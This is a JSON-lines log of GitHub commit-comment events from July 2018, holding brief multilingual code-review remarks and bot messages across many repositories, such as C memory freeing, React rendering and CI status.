{"id":"7937032971","type":"CommitCommentEvent","actor":{"login":"Raghees-butt"},"repo":{"name":"meteor/simple-todos-react"},"payload":{"comment":{"id":29640203,"position":22,"line":12,"path":"imports/ui/App.js","commit_id":"e618d9e3650682448456219b32d29ee9d0023925","created_at":"2018-07-09T11:29:23Z","updated_at":"2018-07-09T11:29:23Z","author_association":"NONE","body":"try it with `render() {..}` instead of `renderTasks() {...}`"}},"created_at":"2018-07-09T11:29:23Z"}
{"id":"7937033177","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/pyoos-feedstock"},"payload":{"comment":{"id":29640204,"position":null,"line":null,"path":null,"commit_id":"fa0b85003d489ca18be9d40f87466e86d1bbc0e0","created_at":"2018-07-09T11:29:27Z","updated_at":"2018-07-09T11:29:27Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @lukecampbell were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @lukecampbell were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T11:29:27Z"}
{"id":"7937035505","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"remilia15/android_device_samsung_scx30g-common"},"payload":{"comment":{"id":29640207,"position":24,"line":93,"path":"ril/secril-shim/secril-shim.cpp","commit_id":"b4f100e04570338ae4d5a1fca9b7f355f0407a06","created_at":"2018-07-09T11:29:57Z","updated_at":"2018-07-09T11:29:57Z","author_association":"CONTRIBUTOR","body":"Yes I know. But this is C. We are dealing with pointer and the memory that that pointer point to. They are 2 very difference thing. You have just assigned the pointer it self, not the memory that that pointer pointed to. After you free the pointer, actually the pointer it self has no changes, but the memory it pointed to is freed and become invalid."}},"created_at":"2018-07-09T11:29:57Z"}
{"id":"7937038077","type":"CommitCommentEvent","actor":{"login":"victoriaogomes"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29640214,"position":null,"line":null,"path":null,"commit_id":"5c810f3a5ff93d727420543ea97f24f8243ef9ec","created_at":"2018-07-09T11:30:29Z","updated_at":"2018-07-09T11:30:29Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Formulário de fale conosco funcionando](https://trello.com/c/uwWD7neG/213-formul%C3%A1rio-de-fale-conosco-funcionando)"}},"created_at":"2018-07-09T11:30:29Z"}
{"id":"7937038323","type":"CommitCommentEvent","actor":{"login":"Raghees-butt"},"repo":{"name":"meteor/simple-todos-react"},"payload":{"comment":{"id":29640215,"position":19,"line":10,"path":"imports/ui/App.js","commit_id":"e618d9e3650682448456219b32d29ee9d0023925","created_at":"2018-07-09T11:30:32Z","updated_at":"2018-07-09T11:30:32Z","author_association":"NONE","body":"works with with `render(){`"}},"created_at":"2018-07-09T11:30:32Z"}
{"id":"7937039903","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"remilia15/android_device_samsung_scx30g-common"},"payload":{"comment":{"id":29640218,"position":24,"line":93,"path":"ril/secril-shim/secril-shim.cpp","commit_id":"b4f100e04570338ae4d5a1fca9b7f355f0407a06","created_at":"2018-07-09T11:30:52Z","updated_at":"2018-07-09T11:30:52Z","author_association":"CONTRIBUTOR","body":"Do not confuse Java reference with C pointer. They are not the same!"}},"created_at":"2018-07-09T11:30:52Z"}
{"id":"7937042700","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"remilia15/android_device_samsung_scx30g-common"},"payload":{"comment":{"id":29640225,"position":24,"line":93,"path":"ril/secril-shim/secril-shim.cpp","commit_id":"b4f100e04570338ae4d5a1fca9b7f355f0407a06","created_at":"2018-07-09T11:31:30Z","updated_at":"2018-07-09T11:31:30Z","author_association":"CONTRIBUTOR","body":"That why we have to free malloced memory."}},"created_at":"2018-07-09T11:31:30Z"}
{"id":"7937043532","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29640229,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-09T11:31:40Z","updated_at":"2018-07-09T11:31:40Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T11:31:40Z"}
{"id":"7937050880","type":"CommitCommentEvent","actor":{"login":"nlct"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29640242,"position":null,"line":null,"path":null,"commit_id":"1e1a0ea90ec131c53d6b1111604f6b55da0bdbb5","created_at":"2018-07-09T11:33:20Z","updated_at":"2018-07-09T11:33:20Z","author_association":"COLLABORATOR","body":"@cereda That looks fine. I'm on the last part now, so nearly there! :smiley: "}},"created_at":"2018-07-09T11:33:20Z"}
{"id":"7937056659","type":"CommitCommentEvent","actor":{"login":"hmcosta"},"repo":{"name":"isec-aet/lesson-66-diana-pedro"},"payload":{"comment":{"id":29640255,"position":null,"line":null,"path":null,"commit_id":"93f2ce86dc5c25c52220970ca67b30e17be840ed","created_at":"2018-07-09T11:34:38Z","updated_at":"2018-07-09T11:34:38Z","author_association":"CONTRIBUTOR","body":"Olá Pedro e Diana\r\nEstive a avaliar o projecto da aula 66. É um bom começo mas ainda falta fazer mais coisas.\r\nSe submeterem uma nova versão p.f. avisem.\r\nMudei o vosso repositório para privado.\r\nCumprimentos,\r\nHC"}},"created_at":"2018-07-09T11:34:38Z"}
{"id":"7937057500","type":"CommitCommentEvent","actor":{"login":"tkachpavlo1"},"repo":{"name":"tkachpavlo1/VeloProjectTest1"},"payload":{"comment":{"id":29640256,"position":null,"line":null,"path":null,"commit_id":"acef5a66400ba1d1105e6c5c0912e8ac22e10d6b","created_at":"2018-07-09T11:34:49Z","updated_at":"2018-07-09T11:34:49Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-09T11:34:49Z"}
{"id":"7937057872","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29640257,"position":null,"line":null,"path":null,"commit_id":"1e1a0ea90ec131c53d6b1111604f6b55da0bdbb5","created_at":"2018-07-09T11:34:54Z","updated_at":"2018-07-09T11:34:54Z","author_association":"OWNER","body":"Woo :duck:  :duck:  :duck:  :duck: "}},"created_at":"2018-07-09T11:34:54Z"}
{"id":"7937060856","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtootsuka/MeikaiJava_ootsuka"},"payload":{"comment":{"id":29640264,"position":6,"line":21,"path":"kennsyuu1/src/kennsyuu1/E4_6_List4_7.java","commit_id":"1949ab3601477b1de8688bf3a6a78c37e1f09811","created_at":"2018-07-09T11:35:34Z","updated_at":"2018-07-09T11:35:34Z","author_association":"COLLABORATOR","body":"スタンダードなのは英語なので、ataiのようなローマ字変数は避けて英語の名前を考えてみてください。\r\n佐藤"}},"created_at":"2018-07-09T11:35:34Z"}
{"id":"7937061489","type":"CommitCommentEvent","actor":{"login":"mutoe"},"repo":{"name":"slimkit/plus-small-screen-client"},"payload":{"comment":{"id":29640266,"position":null,"line":null,"path":null,"commit_id":"d0dbce293164326876bb0d793c2611af6f531d44","created_at":"2018-07-09T11:35:43Z","updated_at":"2018-07-09T11:35:43Z","author_association":"COLLABORATOR","body":"这是要转型react的节奏了吗"}},"created_at":"2018-07-09T11:35:43Z"}
{"id":"7937061855","type":"CommitCommentEvent","actor":{"login":"etienne02"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29640267,"position":8,"line":12,"path":".travis.yml","commit_id":"338e0d10a35543f6f73dfbe9010157d1edcc135f","created_at":"2018-07-09T11:35:48Z","updated_at":"2018-07-09T11:35:48Z","author_association":"NONE","body":"Typo : 1804, is not trusty but bionic"}},"created_at":"2018-07-09T11:35:48Z"}
{"id":"7937065743","type":"CommitCommentEvent","actor":{"login":"cereda"},"repo":{"name":"cereda/arara"},"payload":{"comment":{"id":29640280,"position":null,"line":null,"path":null,"commit_id":"1e1a0ea90ec131c53d6b1111604f6b55da0bdbb5","created_at":"2018-07-09T11:36:40Z","updated_at":"2018-07-09T11:36:40Z","author_association":"OWNER","body":"Gotta love the WhatsApp duck!\r\n\r\n![duck](https://user-images.githubusercontent.com/302062/42448298-29dfceda-8353-11e8-8a66-421457a460c1.png)\r\n"}},"created_at":"2018-07-09T11:36:40Z"}
{"id":"7937066489","type":"CommitCommentEvent","actor":{"login":"KalleZ"},"repo":{"name":"php/php-src"},"payload":{"comment":{"id":29640283,"position":null,"line":null,"path":null,"commit_id":"d6e81f0bfd0cb90586dd83d4fd47a4302605261a","created_at":"2018-07-09T11:36:50Z","updated_at":"2018-07-09T11:36:50Z","author_association":"CONTRIBUTOR","body":"@t-zuehlsdorff curious, does your build include the compilation of the hash extension?"}},"created_at":"2018-07-09T11:36:50Z"}
{"id":"7937067662","type":"CommitCommentEvent","actor":{"login":"raakey"},"repo":{"name":"raakey/Rakesh1"},"payload":{"comment":{"id":29640286,"position":null,"line":null,"path":null,"commit_id":"67bf72e667995f1bdb4aad9a6a4ecb52ea62c334","created_at":"2018-07-09T11:37:06Z","updated_at":"2018-07-09T11:37:06Z","author_association":"OWNER","body":"Commit"}},"created_at":"2018-07-09T11:37:06Z"}
{"id":"7937068198","type":"CommitCommentEvent","actor":{"login":"medz"},"repo":{"name":"slimkit/plus-small-screen-client"},"payload":{"comment":{"id":29640287,"position":null,"line":null,"path":null,"commit_id":"d0dbce293164326876bb0d793c2611af6f531d44","created_at":"2018-07-09T11:37:14Z","updated_at":"2018-07-09T11:37:14Z","author_association":"MEMBER","body":"@mutoe 也不是不可以，我们最早的时候就是用  React 开发的，客户很多都不会才在 TS+ 里面用 Vue.js 的"}},"created_at":"2018-07-09T11:37:14Z"}
{"id":"7937068780","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtootsuka/MeikaiJava_ootsuka"},"payload":{"comment":{"id":29640290,"position":13,"line":26,"path":"kennsyuu1/src/kennsyuu1/E4_6_List4_7.java","commit_id":"1949ab3601477b1de8688bf3a6a78c37e1f09811","created_at":"2018-07-09T11:37:22Z","updated_at":"2018-07-09T11:37:22Z","author_association":"COLLABORATOR","body":"0未満で再入力させるのはなぜでしょうか。それをコメントにしましょう。"}},"created_at":"2018-07-09T11:37:22Z"}
{"id":"7937069601","type":"CommitCommentEvent","actor":{"login":"camillemonchicourt"},"repo":{"name":"PnX-SI/Nomenclature-api-module"},"payload":{"comment":{"id":29640292,"position":null,"line":null,"path":null,"commit_id":"9c1d5e972eda8428dc87bfc55696b107d8dc5940","created_at":"2018-07-09T11:37:33Z","updated_at":"2018-07-09T11:37:33Z","author_association":"MEMBER","body":"OK."}},"created_at":"2018-07-09T11:37:33Z"}
{"id":"7937070577","type":"CommitCommentEvent","actor":{"login":"ayyazdaniaryan"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29640295,"position":null,"line":null,"path":null,"commit_id":"969564d127d40d2bda82948319aea8747e0955b8","created_at":"2018-07-09T11:37:47Z","updated_at":"2018-07-09T11:37:47Z","author_association":"MEMBER","body":"Looks good 👍 "}},"created_at":"2018-07-09T11:37:47Z"}
{"id":"7937072176","type":"CommitCommentEvent","actor":{"login":"maximus1998g"},"repo":{"name":"maximus1998g/mini-insta"},"payload":{"comment":{"id":29640297,"position":null,"line":null,"path":null,"commit_id":"70c8c93a0b6e94ca3c222d1c33aede923735ecfb","created_at":"2018-07-09T11:38:11Z","updated_at":"2018-07-09T11:38:11Z","author_association":"OWNER","body":"1. wildcard в .gitignore\r\n2. убрал unicode_literals\r\n3. исправил пункт 5\r\n4. исправил ссылки на шаблонный тег url\r\n5. для хранения секретов использовал django-environ"}},"created_at":"2018-07-09T11:38:11Z"}
{"id":"7937072987","type":"CommitCommentEvent","actor":{"login":"AlisonCarranza"},"repo":{"name":"AlisonCarranza/Bases-de-Datos-"},"payload":{"comment":{"id":29640299,"position":null,"line":null,"path":null,"commit_id":"75522023d5a174eb16fbee3c8ae2ed10d4b96439","created_at":"2018-07-09T11:38:22Z","updated_at":"2018-07-09T11:38:22Z","author_association":"OWNER","body":"Modelo Entidad_Relacion\r\n"}},"created_at":"2018-07-09T11:38:22Z"}
{"id":"7937084821","type":"CommitCommentEvent","actor":{"login":"farhad99"},"repo":{"name":"farhad99/Onepage-Creative-Pro"},"payload":{"comment":{"id":29640325,"position":null,"line":null,"path":null,"commit_id":"2db7d0d77242e935062dd4a1a482d9da37910d8a","created_at":"2018-07-09T11:41:09Z","updated_at":"2018-07-09T11:41:09Z","author_association":"OWNER","body":"Changing Images"}},"created_at":"2018-07-09T11:41:09Z"}
{"id":"7937085277","type":"CommitCommentEvent","actor":{"login":"jaymoulin"},"repo":{"name":"jaymoulin/google-music-manager"},"payload":{"comment":{"id":29640326,"position":5,"line":41,"path":"uploader/google_music_manager_uploader/uploader_daemon.py","commit_id":"55b8e895db15aa14e88251f122269086db0053ff","created_at":"2018-07-09T11:41:15Z","updated_at":"2018-07-09T11:41:15Z","author_association":"OWNER","body":"This condition is necessary - related to #11 . Should be fixed with 1.2.3"}},"created_at":"2018-07-09T11:41:15Z"}
{"id":"7937090983","type":"CommitCommentEvent","actor":{"login":"Aitozi"},"repo":{"name":"apache/flink"},"payload":{"comment":{"id":29640344,"position":null,"line":null,"path":null,"commit_id":"8c89f3c6b5ebd0334176d9e7e57b38b4d39a594a","created_at":"2018-07-09T11:42:32Z","updated_at":"2018-07-09T11:42:32Z","author_association":"CONTRIBUTOR","body":"Hi, do you discuss about the logic change of Trigger in  the PR: https://github.com/apache/flink/pull/6224"}},"created_at":"2018-07-09T11:42:32Z"}
{"id":"7937091010","type":"CommitCommentEvent","actor":{"login":"tjikkun"},"repo":{"name":"AntagonistHQ/circus"},"payload":{"comment":{"id":29640346,"position":null,"line":null,"path":null,"commit_id":"b21eab5c65040cda33199dac72cc622205bb7afb","created_at":"2018-07-09T11:42:32Z","updated_at":"2018-07-09T11:42:32Z","author_association":"COLLABORATOR","body":"manage_watchers voegt het weer toe, omdat de status naar stopped gaat"}},"created_at":"2018-07-09T11:42:32Z"}
{"id":"7937091779","type":"CommitCommentEvent","actor":{"login":"nikitarub"},"repo":{"name":"uburu/uburu.github.io"},"payload":{"comment":{"id":29640349,"position":73,"line":64,"path":"templates/circle.js","commit_id":"65b725a0e7ef2407a5f9c472a46dd72e5e7cc5b2","created_at":"2018-07-09T11:42:43Z","updated_at":"2018-07-09T11:42:43Z","author_association":"CONTRIBUTOR","body":"@Ermako27 Слушай, я вот не понял, картинка сохраняется в jpg, а путь jpeg, или это ни на что не влияет?"}},"created_at":"2018-07-09T11:42:43Z"}
{"id":"7937093908","type":"CommitCommentEvent","actor":{"login":"thomasbirien"},"repo":{"name":"thomasbirien/doctolib-test"},"payload":{"comment":{"id":29640353,"position":64,"line":63,"path":"app/models/event.rb","commit_id":"ccfd8c75ae4a104955db1a3166e6e45497888480","created_at":"2018-07-09T11:43:14Z","updated_at":"2018-07-09T11:43:14Z","author_association":"OWNER","body":"cette methode a pour but de me donner un array d'heure coupé de 30 minutes en 30 minutes en utilisant le starts_at et le ends_at. Se qui servira de range."}},"created_at":"2018-07-09T11:43:14Z"}
{"id":"7937094462","type":"CommitCommentEvent","actor":{"login":"rajudev"},"repo":{"name":"LeoIannacone/npm2deb"},"payload":{"comment":{"id":29640358,"position":null,"line":null,"path":null,"commit_id":"da2b19f217aaf5dc6ca190fffdff6cc718389b74","created_at":"2018-07-09T11:43:21Z","updated_at":"2018-07-09T11:43:21Z","author_association":"CONTRIBUTOR","body":"@divatemangesh thanks a lot for the fix. "}},"created_at":"2018-07-09T11:43:21Z"}
{"id":"7937095832","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29640362,"position":40,"line":1718,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"754286c3f4811724957f820462d4e5d6272159fd","created_at":"2018-07-09T11:43:41Z","updated_at":"2018-07-09T11:43:41Z","author_association":"COLLABORATOR","body":"these might be better as `<num><ord>`"}},"created_at":"2018-07-09T11:43:41Z"}
{"id":"7937097103","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29640365,"position":59,"line":1737,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"754286c3f4811724957f820462d4e5d6272159fd","created_at":"2018-07-09T11:43:59Z","updated_at":"2018-07-09T11:43:59Z","author_association":"COLLABORATOR","body":"What number is this?"}},"created_at":"2018-07-09T11:43:59Z"}
{"id":"7937097515","type":"CommitCommentEvent","actor":{"login":"thomasbirien"},"repo":{"name":"thomasbirien/doctolib-test"},"payload":{"comment":{"id":29640368,"position":6,"line":5,"path":"app/models/event.rb","commit_id":"ccfd8c75ae4a104955db1a3166e6e45497888480","created_at":"2018-07-09T11:44:05Z","updated_at":"2018-07-09T11:44:05Z","author_association":"OWNER","body":"Ceci est la methode principal qui servira à nous retourner un array de hash avec les dates et les slots de disponibilité."}},"created_at":"2018-07-09T11:44:05Z"}
{"id":"7937099983","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29640372,"position":80,"line":1758,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"754286c3f4811724957f820462d4e5d6272159fd","created_at":"2018-07-09T11:44:38Z","updated_at":"2018-07-09T11:44:38Z","author_association":"COLLABORATOR","body":"LR here, Use/MT in tur"}},"created_at":"2018-07-09T11:44:38Z"}
{"id":"7937100641","type":"CommitCommentEvent","actor":{"login":"blubber"},"repo":{"name":"AntagonistHQ/circus"},"payload":{"comment":{"id":29640374,"position":null,"line":null,"path":null,"commit_id":"b21eab5c65040cda33199dac72cc622205bb7afb","created_at":"2018-07-09T11:44:46Z","updated_at":"2018-07-09T11:44:46Z","author_association":"NONE","body":"Lijkt mij prima voor een pr dan."}},"created_at":"2018-07-09T11:44:46Z"}
{"id":"7937101396","type":"CommitCommentEvent","actor":{"login":"Senui"},"repo":{"name":"BioDynaMo/biodynamo"},"payload":{"comment":{"id":29640376,"position":null,"line":null,"path":null,"commit_id":"0437487f720ced6afbd41f214ee3c2e22f54724d","created_at":"2018-07-09T11:44:57Z","updated_at":"2018-07-09T11:44:57Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Check diffusion results](https://trello.com/c/OKPkSI9c/200-check-diffusion-results)"}},"created_at":"2018-07-09T11:44:57Z"}
{"id":"7937102050","type":"CommitCommentEvent","actor":{"login":"thomasbirien"},"repo":{"name":"thomasbirien/doctolib-test"},"payload":{"comment":{"id":29640379,"position":36,"line":35,"path":"app/models/event.rb","commit_id":"ccfd8c75ae4a104955db1a3166e6e45497888480","created_at":"2018-07-09T11:45:07Z","updated_at":"2018-07-09T11:45:07Z","author_association":"OWNER","body":"la première étape est de faire un tri pour enlever les moments \"d'occupation\""}},"created_at":"2018-07-09T11:45:07Z"}
{"id":"7937102936","type":"CommitCommentEvent","actor":{"login":"ppaalanen"},"repo":{"name":"igel-oss/weston"},"payload":{"comment":{"id":29640383,"position":24,"line":1843,"path":"compositor/main.c","commit_id":"b89fac06f5378a8cbc5057cb6773f7bd8e8a312c","created_at":"2018-07-09T11:45:18Z","updated_at":"2018-07-09T11:45:18Z","author_association":"CONTRIBUTOR","body":"Freeing `modeline` should happen in `remoted_output_init()`, otherwise it may get leaked there."}},"created_at":"2018-07-09T11:45:18Z"}
{"id":"7937103195","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29640385,"position":95,"line":4863,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"754286c3f4811724957f820462d4e5d6272159fd","created_at":"2018-07-09T11:45:21Z","updated_at":"2018-07-09T11:45:21Z","author_association":"COLLABORATOR","body":"why noun for this?"}},"created_at":"2018-07-09T11:45:21Z"}
{"id":"7937104801","type":"CommitCommentEvent","actor":{"login":"ppaalanen"},"repo":{"name":"igel-oss/weston"},"payload":{"comment":{"id":29640391,"position":605,"line":605,"path":"remoting/remoting-plugin.c","commit_id":"b89fac06f5378a8cbc5057cb6773f7bd8e8a312c","created_at":"2018-07-09T11:45:42Z","updated_at":"2018-07-09T11:45:42Z","author_association":"CONTRIBUTOR","body":"Here should probably be a call to `weston_head_release()` as well."}},"created_at":"2018-07-09T11:45:42Z"}
{"id":"7937105238","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29640396,"position":50,"line":1728,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"754286c3f4811724957f820462d4e5d6272159fd","created_at":"2018-07-09T11:45:48Z","updated_at":"2018-07-09T11:45:48Z","author_association":"COLLABORATOR","body":"Use/MT in tur"}},"created_at":"2018-07-09T11:45:48Z"}
{"id":"7937105369","type":"CommitCommentEvent","actor":{"login":"Youssouf-Bologna"},"repo":{"name":"CoBlondel/exerciceBlogAngularOpenclassroom"},"payload":{"comment":{"id":29640397,"position":null,"line":null,"path":null,"commit_id":"fe48d811e075d0e2aa6ddd11dd442968df1d870b","created_at":"2018-07-09T11:45:50Z","updated_at":"2018-07-09T11:45:50Z","author_association":"NONE","body":"merge"}},"created_at":"2018-07-09T11:45:50Z"}
{"id":"7937106960","type":"CommitCommentEvent","actor":{"login":"ppaalanen"},"repo":{"name":"igel-oss/weston"},"payload":{"comment":{"id":29640403,"position":null,"line":null,"path":null,"commit_id":"b89fac06f5378a8cbc5057cb6773f7bd8e8a312c","created_at":"2018-07-09T11:46:13Z","updated_at":"2018-07-09T11:46:13Z","author_association":"CONTRIBUTOR","body":"The changes from v11 look good!"}},"created_at":"2018-07-09T11:46:13Z"}
{"id":"7937107052","type":"CommitCommentEvent","actor":{"login":"pellemark"},"repo":{"name":"pellemark/webtodo"},"payload":{"comment":{"id":29640405,"position":null,"line":null,"path":null,"commit_id":"3c0c8c30d3ae04612ba8f7edc792f616fa25225b","created_at":"2018-07-09T11:46:14Z","updated_at":"2018-07-09T11:46:14Z","author_association":"OWNER","body":"ezekre itt a komment szekció, ez akar lenni a spec. 👍 "}},"created_at":"2018-07-09T11:46:14Z"}
{"id":"7937107174","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29640406,"position":51,"line":1729,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"754286c3f4811724957f820462d4e5d6272159fd","created_at":"2018-07-09T11:46:15Z","updated_at":"2018-07-09T11:46:15Z","author_association":"COLLABORATOR","body":"Might be better to have this along with alaikum"}},"created_at":"2018-07-09T11:46:15Z"}
{"id":"7937111134","type":"CommitCommentEvent","actor":{"login":"remilia15"},"repo":{"name":"remilia15/android_device_samsung_scx30g-common"},"payload":{"comment":{"id":29640412,"position":24,"line":93,"path":"ril/secril-shim/secril-shim.cpp","commit_id":"b4f100e04570338ae4d5a1fca9b7f355f0407a06","created_at":"2018-07-09T11:47:09Z","updated_at":"2018-07-09T11:47:09Z","author_association":"OWNER","body":"Damn, since when I'm on this noob level :x\r\n\r\nTo be honest, I'm just afraid of memory leak so added free according to your default implementation"}},"created_at":"2018-07-09T11:47:09Z"}
{"id":"7937111262","type":"CommitCommentEvent","actor":{"login":"rhafer"},"repo":{"name":"rhafer/crowbar-openstack"},"payload":{"comment":{"id":29640413,"position":33,"line":33,"path":"chef/cookbooks/crowbar-openstack/recipes/pg2mariadb_preparation.rb","commit_id":"a798efac834e33e1309fe966d2039b8c6e3016fb","created_at":"2018-07-09T11:47:11Z","updated_at":"2018-07-09T11:47:11Z","author_association":"OWNER","body":"Oops, yes."}},"created_at":"2018-07-09T11:47:11Z"}
{"id":"7937111616","type":"CommitCommentEvent","actor":{"login":"deepshikha2k5"},"repo":{"name":"deepshikha2k5/project-sunbird.github.io"},"payload":{"comment":{"id":29640414,"position":null,"line":null,"path":null,"commit_id":"b54206f012abea41fdad9eeed5c0b8da7cd545a0","created_at":"2018-07-09T11:47:16Z","updated_at":"2018-07-09T11:47:16Z","author_association":"OWNER","body":"changes in the file"}},"created_at":"2018-07-09T11:47:16Z"}
{"id":"7937114719","type":"CommitCommentEvent","actor":{"login":"sbliven"},"repo":{"name":"Pymol-Scripts/Pymol-script-repo"},"payload":{"comment":{"id":29640423,"position":null,"line":null,"path":null,"commit_id":"21077e719b894ef90b284b92e36ccc44b68d95b4","created_at":"2018-07-09T11:47:57Z","updated_at":"2018-07-09T11:47:57Z","author_association":"CONTRIBUTOR","body":"Does moving this into the constructor really fix #70? It seems like this should just delay the bug until after running autodock the first time."}},"created_at":"2018-07-09T11:47:57Z"}
{"id":"7937116760","type":"CommitCommentEvent","actor":{"login":"thomasbirien"},"repo":{"name":"thomasbirien/doctolib-test"},"payload":{"comment":{"id":29640431,"position":39,"line":38,"path":"app/models/event.rb","commit_id":"ccfd8c75ae4a104955db1a3166e6e45497888480","created_at":"2018-07-09T11:48:25Z","updated_at":"2018-07-09T11:48:25Z","author_association":"OWNER","body":"on prend une range entre la start date et 6 jours plus tard, pour construire l'array avec 7 entré et donc 7 jours avec les disponibilités."}},"created_at":"2018-07-09T11:48:25Z"}
{"id":"7937118137","type":"CommitCommentEvent","actor":{"login":"rhafer"},"repo":{"name":"rhafer/crowbar-openstack"},"payload":{"comment":{"id":29640438,"position":41,"line":41,"path":"chef/cookbooks/crowbar-openstack/recipes/pg2mariadb_preparation.rb","commit_id":"a798efac834e33e1309fe966d2039b8c6e3016fb","created_at":"2018-07-09T11:48:42Z","updated_at":"2018-07-09T11:48:42Z","author_association":"OWNER","body":"Thanks, for figuring out all the command for these projects. That's one of the thing I never completed."}},"created_at":"2018-07-09T11:48:42Z"}
{"id":"7937118359","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640439,"position":null,"line":null,"path":null,"commit_id":"b5a5e8f5a61b2e84dec153bb8984dd1cfb8a598f","created_at":"2018-07-09T11:48:46Z","updated_at":"2018-07-09T11:48:46Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://4c23ce29.ngrok.io/ui#review:id=392)"}},"created_at":"2018-07-09T11:48:46Z"}
{"id":"7937118421","type":"CommitCommentEvent","actor":{"login":"gerasimenkoeugene"},"repo":{"name":"gerasimenkoeugene/Module"},"payload":{"comment":{"id":29640440,"position":null,"line":null,"path":null,"commit_id":"b5a5e8f5a61b2e84dec153bb8984dd1cfb8a598f","created_at":"2018-07-09T11:48:47Z","updated_at":"2018-07-09T11:48:47Z","author_association":"OWNER","body":"Collaborator cannot find remote user mapping for author"}},"created_at":"2018-07-09T11:48:47Z"}
{"id":"7937118739","type":"CommitCommentEvent","actor":{"login":"thomasbirien"},"repo":{"name":"thomasbirien/doctolib-test"},"payload":{"comment":{"id":29640442,"position":41,"line":40,"path":"app/models/event.rb","commit_id":"ccfd8c75ae4a104955db1a3166e6e45497888480","created_at":"2018-07-09T11:48:50Z","updated_at":"2018-07-09T11:48:50Z","author_association":"OWNER","body":"on initialise le hash et on prend toujours la date."}},"created_at":"2018-07-09T11:48:50Z"}
{"id":"7937118761","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"remilia15/android_device_samsung_scx30g-common"},"payload":{"comment":{"id":29640443,"position":24,"line":93,"path":"ril/secril-shim/secril-shim.cpp","commit_id":"b4f100e04570338ae4d5a1fca9b7f355f0407a06","created_at":"2018-07-09T11:48:51Z","updated_at":"2018-07-09T11:48:51Z","author_association":"CONTRIBUTOR","body":"Yeah. In my impl, I free after call the original ril :)"}},"created_at":"2018-07-09T11:48:51Z"}
{"id":"7937124732","type":"CommitCommentEvent","actor":{"login":"gengjiawen"},"repo":{"name":"facebook/metro"},"payload":{"comment":{"id":29640457,"position":null,"line":null,"path":null,"commit_id":"3f9cb2e7557a7fcc15f41c4764cd59ca3d9acc82","created_at":"2018-07-09T11:50:05Z","updated_at":"2018-07-09T11:50:05Z","author_association":"NONE","body":"This problem still exists with the change https://github.com/facebook/metro/issues/181."}},"created_at":"2018-07-09T11:50:05Z"}
